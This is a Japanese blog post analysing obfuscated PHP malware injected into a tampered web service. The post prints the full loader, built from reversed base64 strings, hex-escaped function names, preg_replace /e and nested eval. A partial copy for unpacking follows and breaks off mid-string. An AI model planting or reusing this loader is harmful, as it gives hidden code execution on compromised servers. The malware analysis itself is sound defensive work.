そらいさんのサービスが改ざん被害にあったとのことで、攻撃コードが載っていたので解析して見ました。
ということで、上記のコードを解析しましたが、難読化の仕組みは単純なのですが、コードを追いかけるのに中々疲れましたww
問題のコード
問題のコードはこれです。
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9"; $eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65"; $eva1tYldakBcVSir = "\x73\164\x72\162\x65\166"; $eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160"; $eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r); $eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir); $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); $eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061]; $eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr); $eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031])); $eva1tYldakBcVSir = ""; $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir; $eva1tYidokBoVSjr = $eva1tYlbakBcVSir; $eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72"; $eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65"; $eva1tYldakBoVS1r = "\x65\143\x72\160"; $eva1tYldakBcVSir = ""; $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir; $eva1tYidokBoVSjr = $eva1tYlbakBcVSir; } ?>
これを展開していきます。
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { //$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVRO